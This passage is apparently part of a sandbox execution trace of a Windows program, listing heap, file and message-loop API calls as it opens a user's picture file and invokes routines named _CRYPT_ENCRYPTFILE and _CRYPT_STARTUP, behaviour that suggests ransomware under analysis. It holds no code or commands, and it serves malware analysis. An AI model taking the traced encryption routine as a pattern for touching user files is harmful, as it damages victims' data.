dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0094.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0094.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.735] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0094.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0094.736] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\w zdfbd_wansc.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.736] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431daa0 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0094.738] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0094.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.740] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 1 [0094.740] TranslateMessage (lpMsg=0x144e9a4) returned 0 [0094.740] DispatchMessageW (lpMsg=0x144e9a4) returned 0x0 [0094.740] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0094.740] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0094.740] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.740] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0094.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.741] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0094.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431daa0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.743] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0094.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca3b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0094.743] CloseHandle (hObject=0x258) returned 1 [0094.752] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.752] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0094.752] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\W ZDfbD_wanSc.gif", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f70a7d0, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xd4154c50, ftLastAccessTime.dwHighDateTime=0x1d5eda5, ftLastWriteTime.dwLowDateTime=0xd4154c50, ftLastWriteTime.dwHighDateTime=0x1d5eda5, nFileSizeHigh=0x0, nFileSizeLow=0xf2e9, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="W ZDfbD_wanSc.gif", cAlternateFileName="WZDFBD~1.GIF")) returned 0x41ac180 [0094.752] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0094.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0094.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.753] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0094.753] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.753] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0094.754] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0094.754] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 